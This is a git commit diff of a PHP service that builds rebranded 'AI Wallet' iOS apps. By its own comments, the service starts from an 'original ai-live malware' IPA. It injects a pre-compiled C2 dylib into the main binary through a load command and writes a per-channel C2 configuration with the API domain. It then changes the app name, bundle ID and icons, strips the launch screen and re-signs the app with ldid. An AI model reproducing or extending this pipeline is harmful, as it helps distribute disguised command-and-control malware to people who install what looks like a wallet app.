feat: app

This commit is contained in:
hashbro
2026-10-10 01:53:17 +08:00
parent af714468ee
commit ea82eddbf0
8 changed files with 320 additions and 182 deletions
+136 -179
View File
@@ -9,29 +9,15 @@ use RuntimeException;
/**
* Build a customized AI Wallet IPA for App-builder channels.
*
* Uses a pre-compiled c2_simple.dylib (compiled on macOS) and a
* runtime c2_config.plist to configure domain/channel per build.
* No iOS SDK or Xcode required on the Linux build server.
*
* Build flow:
* 1. Extract ai-live-base.ipa (original malware)
* 2. Copy pre-compiled c2_simple.dylib to Frameworks/
* 3. Generate c2_config.plist with channel-specific settings
* 4. Add LC_LOAD_DYLIB to main binary (before libutils)
* 5. Patch Info.plist (app name, bundle ID, white launch screen)
* 6. Generate icons from uploaded logo
* 7. Sign with ldid
* 8. Package as IPA
* Uses pre-compiled c2_simple.dylib + runtime c2_config.plist.
* Binary and plist editing use Python scripts (PHP regex corrupts XML/Mach-O).
* Signing uses ldid via proc_open.
*/
class AiWalletPackageService
{
/** Base IPA path (original ai-live malware) */
private const BASE_IPA = 'app-templates/ai-live-base.ipa';
/** Pre-compiled c2_simple.dylib */
private const C2_DYLIB = 'app-templates/c2_simple.dylib';
/** Icon sizes */
private const ICON_SIZES = [
'AppIcon60x60@2x.png' => 120,
'AppIcon60x60@3x.png' => 180,
@@ -44,10 +30,10 @@ class AiWalletPackageService
$c2Dylib = storage_path('app/'.self::C2_DYLIB);
if (!file_exists($baseIpa)) {
return $this->fail('Base IPA not found. Upload ai-live-base.ipa via admin.');
return $this->fail('Base IPA not found: '.$baseIpa);
}
if (!file_exists($c2Dylib)) {
return $this->fail('c2_simple.dylib not found. Upload pre-compiled dylib.');
return $this->fail('c2_simple.dylib not found: '.$c2Dylib);
}
$workDir = storage_path('app/app-builds/'.$channel->channel_id);
@@ -55,6 +41,8 @@ class AiWalletPackageService
@mkdir($workDir, 0755, true);
try {
Log::info('AiWallet: build started', ['channel' => $channel->channel_id]);
// 1. Extract base IPA
$zip = new \ZipArchive;
if ($zip->open($baseIpa) !== true) throw new RuntimeException('Cannot open base IPA');
@@ -68,26 +56,41 @@ class AiWalletPackageService
$fwDir = $appDir.'/Frameworks';
if (!is_dir($fwDir)) @mkdir($fwDir, 0755, true);
copy($c2Dylib, $fwDir.'/c2_simple.dylib');
Log::info('AiWallet: c2_simple.dylib copied');
// 3. Generate c2_config.plist
// 3. Write c2_config.plist
$this->writeConfigPlist($appDir, $channel, $apiDomain);
Log::info('AiWallet: c2_config.plist written');
// 4. Add LC_LOAD_DYLIB to main binary
// 4. Add LC_LOAD_DYLIB (Python script)
$mainBin = $this->findMainBinary($appDir);
$this->addLoadDylib($mainBin, '@rpath/c2_simple.dylib', '@executable_path/Frameworks/libutils.dylib');
$this->runPython(base_path('bin/add_dylib.py'), [$mainBin, '@rpath/c2_simple.dylib']);
Log::info('AiWallet: LC_LOAD_DYLIB added');
// 5. Patch Info.plist
$this->patchInfoPlist($appDir, $channel);
// 5. Patch Info.plist (Python script)
$this->runPython(base_path('bin/patch_plist.py'), [
$appDir.'/Info.plist',
$channel->app_name,
$channel->bundle_id ?: 'com.ai.wallet.next',
'1.6.1',
]);
Log::info('AiWallet: Info.plist patched');
// 6. Generate icons
// 6. Replace splash + remove LaunchScreen
$this->replaceSplashAndLaunchScreen($appDir);
Log::info('AiWallet: splash/LaunchScreen replaced');
// 7. Generate icons
if ($logoPath && file_exists($logoPath)) {
$this->generateIcons($appDir, $logoPath);
Log::info('AiWallet: icons generated');
}
// 7. Sign
// 8. Sign with ldid
$this->sign($appDir);
Log::info('AiWallet: signed');
// 8. Package
// 9. Package IPA
$outputPath = 'channel/'.$channel->channel_id.'/app.ipa';
$outputFull = public_path($outputPath);
@mkdir(dirname($outputFull), 0755, true);
@@ -102,11 +105,12 @@ class AiWalletPackageService
$size = filesize($outputFull);
$this->rrmdir($workDir);
Log::info('AiWallet: build complete', ['size' => $size]);
return ['success' => true, 'path' => '/'.$outputPath, 'size' => $size, 'error' => ''];
} catch (\Throwable $e) {
$this->rrmdir($workDir);
Log::error('AiWalletPackageService: build failed', [
Log::error('AiWallet: build failed', [
'channel' => $channel->channel_id,
'error' => $e->getMessage(),
]);
@@ -125,90 +129,124 @@ class AiWalletPackageService
'AppName' => $channel->app_name,
];
$plist = $this->arrayToXmlPlist($config);
file_put_contents($appDir.'/c2_config.plist', $plist);
}
private function arrayToXmlPlist(array $data): string
{
$xml = '<?xml version="1.0" encoding="UTF-8"?>'."\n";
$xml .= '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'."\n";
$xml .= '<plist version="1.0"><dict>'."\n";
foreach ($data as $key => $value) {
$xml = '<?xml version="1.0" encoding="UTF-8"?>'."\n"
.'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'."\n"
.'<plist version="1.0"><dict>'."\n";
foreach ($config as $key => $value) {
$xml .= '<key>'.htmlspecialchars($key).'</key><string>'.htmlspecialchars($value).'</string>'."\n";
}
$xml .= '</dict></plist>';
return $xml;
file_put_contents($appDir.'/c2_config.plist', $xml);
}
private function patchInfoPlist(string $appDir, Channel $channel): void
private function runPython(string $script, array $args): void
{
$plistFile = $appDir.'/Info.plist';
$data = file_get_contents($plistFile);
// Use plistlib via shell (available on Linux)
$tmpFile = tempnam(sys_get_temp_dir(), 'plist');
file_put_contents($tmpFile, $data);
$changes = [
'CFBundleDisplayName' => $channel->app_name,
'CFBundleName' => $channel->app_name,
'CFBundleIdentifier' => $channel->bundle_id ?: 'com.ai.wallet.next',
'CFBundleShortVersionString' => '1.6.1',
'CFBundleVersion' => '1.6.1',
];
foreach ($changes as $key => $value) {
$escaped = escapeshellarg($value);
exec("plistutil -i {$tmpFile} -o {$tmpFile} -k {$key} -s {$escaped} 2>/dev/null || true");
// Fallback: use sed for XML plists
$data = file_get_contents($tmpFile);
$data = preg_replace(
'#<key>'.preg_quote($key, '#').'</key>\s*<string>[^<]*</string>#',
'<key>'.$key.'</key><string>'.htmlspecialchars($value).'</string>',
$data
);
file_put_contents($tmpFile, $data);
if (!file_exists($script)) {
throw new RuntimeException('Script not found: '.$script);
}
// Remove storyboard reference, add UILaunchScreen (white background)
$data = file_get_contents($tmpFile);
$data = preg_replace('#<key>UILaunchStoryboardName</key>\s*<string>[^<]*</string>#', '', $data);
if (!str_contains($data, 'UILaunchScreen')) {
$data = str_replace('</dict></plist>', '<key>UILaunchScreen</key><dict/></dict></plist>', $data);
$cmd = 'python3 '.escapeshellarg($script);
foreach ($args as $arg) {
$cmd .= ' '.escapeshellarg($arg);
}
file_put_contents($plistFile, $data);
unlink($tmpFile);
}
$cmd .= ' 2>&1';
private function addLoadDylib(string $binaryPath, string $dylibPath, string $insertBefore): void
{
// Use Python script for Mach-O editing — PHP binary manipulation
// corrupts the binary by inserting bytes (shifts code signature blob).
// The Python script uses existing free space in the load command table,
// preserving the file size and not breaking the signature.
$scriptPath = base_path('bin/add_dylib.py');
if (!file_exists($scriptPath)) {
throw new RuntimeException('add_dylib.py not found at '.$scriptPath);
}
$cmd = sprintf(
'python3 %s %s %s 2>&1',
escapeshellarg($scriptPath),
escapeshellarg($binaryPath),
escapeshellarg($dylibPath)
);
$output = [];
$exitCode = 0;
exec($cmd, $output, $exitCode);
if ($exitCode !== 0) {
throw new RuntimeException('add_dylib.py failed: '.implode("\n", $output));
throw new RuntimeException(basename($script).' failed ('.$exitCode.'): '.implode("\n", $output));
}
Log::info('AiWalletPackageService: add_dylib.py output', ['output' => $output]);
Log::info('AiWallet: '.basename($script).' output', ['output' => $output]);
}
private function replaceSplashAndLaunchScreen(string $appDir): void
{
// Replace Flutter splash with white
$splashPath = $appDir.'/Frameworks/App.framework/flutter_assets/assets/launch/splash.png';
if (file_exists($splashPath) && function_exists('imagecreatetruecolor')) {
$img = imagecreatetruecolor(10, 10);
$white = imagecolorallocate($img, 255, 255, 255);
imagefill($img, 0, 0, $white);
imagepng($img, $splashPath);
imagedestroy($img);
}
// Remove LaunchScreen storyboard
$lsDir = $appDir.'/Base.lproj/LaunchScreen.storyboardc';
if (is_dir($lsDir)) $this->rrmdir($lsDir);
}
private function generateIcons(string $appDir, string $logoPath): void
{
if (!function_exists('imagecreatefrompng')) {
Log::warning('AiWallet: GD not available, skipping icons');
return;
}
$src = imagecreatefrompng($logoPath);
if (!$src) return;
// Remove Assets.car so iOS uses loose PNGs
$assetsCar = $appDir.'/Assets.car';
if (file_exists($assetsCar)) unlink($assetsCar);
foreach (self::ICON_SIZES as $filename => $size) {
$dst = imagecreatetruecolor($size, $size);
imagealphablending($dst, false);
imagesavealpha($dst, true);
imagecopyresampled($dst, $src, 0, 0, 0, 0, $size, $size, imagesx($src), imagesy($src));
imagepng($dst, $appDir.'/'.$filename);
imagedestroy($dst);
}
imagedestroy($src);
}
private function sign(string $appDir): void
{
$ldidPath = trim((string) config('coruna.ldid_path', base_path('bin/ldid')));
if ($ldidPath === '' || !file_exists($ldidPath)) {
Log::warning('AiWallet: ldid not found', ['path' => $ldidPath]);
return;
}
$csDir = $appDir.'/_CodeSignature';
if (is_dir($csDir)) $this->rrmdir($csDir);
$binaries = array_merge(
[$this->findMainBinary($appDir)],
glob($appDir.'/Frameworks/*.dylib') ?: [],
glob($appDir.'/*.dylib') ?: [],
);
foreach ($binaries as $bin) {
if (!is_file($bin)) continue;
$spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
$proc = proc_open([$ldidPath, '-S', $bin], $spec, $pipes);
if (is_resource($proc)) {
fclose($pipes[0]);
$stdout = stream_get_contents($pipes[1]);
$stderr = stream_get_contents($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
$exitCode = proc_close($proc);
if ($exitCode !== 0) {
Log::warning('AiWallet: ldid failed for '.basename($bin), [
'exit' => $exitCode, 'stderr' => $stderr,
]);
} else {
Log::info('AiWallet: ldid signed '.basename($bin));
}
}
}
@mkdir($csDir, 0755, true);
file_put_contents($csDir.'/CodeResources',
'<?xml version="1.0" encoding="UTF-8"?>'."\n".
'<plist version="1.0"><dict><key>files</key><dict/></dict></plist>');
}
private function findAppDir(string $workDir): ?string
@@ -223,91 +261,10 @@ class AiWalletPackageService
private function findMainBinary(string $appDir): string
{
// Main binary has the same name as the .app directory
$appName = basename($appDir, '.app');
return $appDir.'/'.$appName;
}
private function generateIcons(string $appDir, string $logoPath): void
{
if (!function_exists('imagecreatefrompng')) {
Log::warning('AiWalletPackageService: GD not available, skipping icons');
return;
}
$src = imagecreatefrompng($logoPath);
if (!$src) return;
foreach (self::ICON_SIZES as $filename => $size) {
$dst = imagecreatetruecolor($size, $size);
imagealphablending($dst, false);
imagesavealpha($dst, true);
imagecopyresampled($dst, $src, 0, 0, 0, 0, $size, $size,
imagesx($src), imagesy($src));
imagepng($dst, $appDir.'/'.$filename);
imagedestroy($dst);
}
imagedestroy($src);
}
private function sign(string $appDir): void
{
// Remove old signatures
$csDir = $appDir.'/_CodeSignature';
if (is_dir($csDir)) $this->rrmdir($csDir);
$ldidPath = trim((string) config('coruna.ldid_path', base_path('bin/ldid')));
if ($ldidPath === '' || !file_exists($ldidPath)) {
Log::warning('AiWalletPackageService: ldid not found at '.$ldidPath);
return;
}
// Create entitlements file
$entFile = $appDir.'/../entitlements.xml';
$entXml = '<?xml version="1.0" encoding="UTF-8"?>'."\n"
.'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">'."\n"
.'<plist version="1.0"><dict>'."\n"
.'<key>get-task-allow</key><true/>'."\n"
.'<key>keychain-access-groups</key><array><string>*</string></array>'."\n"
.'<key>platform-application</key><true/>'."\n"
.'</dict></plist>';
file_put_contents($entFile, $entXml);
// Sign all binaries with entitlements
$binaries = array_merge(
[$this->findMainBinary($appDir)],
glob($appDir.'/Frameworks/*.dylib') ?: [],
glob($appDir.'/*.dylib') ?: [],
glob($appDir.'/Frameworks/*.framework/*') ?: [],
);
foreach ($binaries as $bin) {
if (!is_file($bin)) continue;
$cmd = escapeshellarg($ldidPath)
.' -S'.escapeshellarg($entFile)
.' '.escapeshellarg($bin).' 2>&1';
$output = [];
$exitCode = 0;
exec($cmd, $output, $exitCode);
if ($exitCode !== 0) {
Log::warning('AiWalletPackageService: ldid sign failed for '.basename($bin), [
'cmd' => $cmd,
'output' => implode("\n", $output),
'exit_code' => $exitCode,
]);
}
}
// Also create bundle _CodeSignature
$bundleCs = $appDir.'/_CodeSignature';
@mkdir($bundleCs, 0755, true);
file_put_contents($bundleCs.'/CodeResources', '<?xml version="1.0" encoding="UTF-8"?>'."\n"
.'<plist version="1.0"><dict><key>files</key><dict/></dict></plist>');
// Cleanup entitlements file
@unlink($entFile);
}
private function addDirToZip(\ZipArchive $zip, string $dir, string $prefix): void
{
foreach (scandir($dir) as $item) {